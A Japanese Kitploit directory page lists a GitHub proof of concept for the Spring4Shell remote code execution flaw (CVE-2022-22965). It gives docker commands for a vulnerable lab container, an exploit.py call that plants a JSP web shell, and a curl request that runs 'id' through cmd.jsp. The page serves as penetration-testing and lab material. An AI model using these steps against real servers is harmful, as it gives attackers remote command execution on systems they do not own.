Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-22965 — JDK 9+ における Data Binding を介した Spring Framework RCE / spring4shell / CVE-2022-22965 | Kitploit
ツール/GitHubGitHub/me2nuk/cve-2022-22965
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubme2nuk/cve-2022-22965

CVE-2022-22965

JDK 9+ における Data Binding を介した Spring Framework RCE / spring4shell / CVE-2022-22965

リポジトリを見る
14824年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Spring4Shell(CVE-2022-22965)

JDK 9+ 上でデータバインディングを介した Spring Framework RCE / spring4shell / CVE-2022-22965

Spring4Shell(CVE-2022-22965) エクスプロイトデモ

https://user-images.githubusercontent.com/57348147/161458377-44ab2f76-f947-4599-aa0a-92cbaac819f8.mp4

ビルド

root@kitploit:~
docker pull me2nuk/cves:2022-22965
docker run -it -p 8080:8080 --name=spring4shell me2nuk/cves:2022-22965

PoC

root@kitploit:~
python3 -m pip install -r requirements.txt
python3 exploit.py --url="http://localhost:8080/exploit/greeting" --dir="webapps/ROOT" --file="cmd"
curl http://localhost:8080/cmd.jsp?cmd=id

参考


  • https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
  • https://github.com/tweedge/springcore-0day-en/blob/main/ANALYSIS_EN.md
  • https://github.com/lunasec-io/Spring4Shell-POC
ツールをダウンロード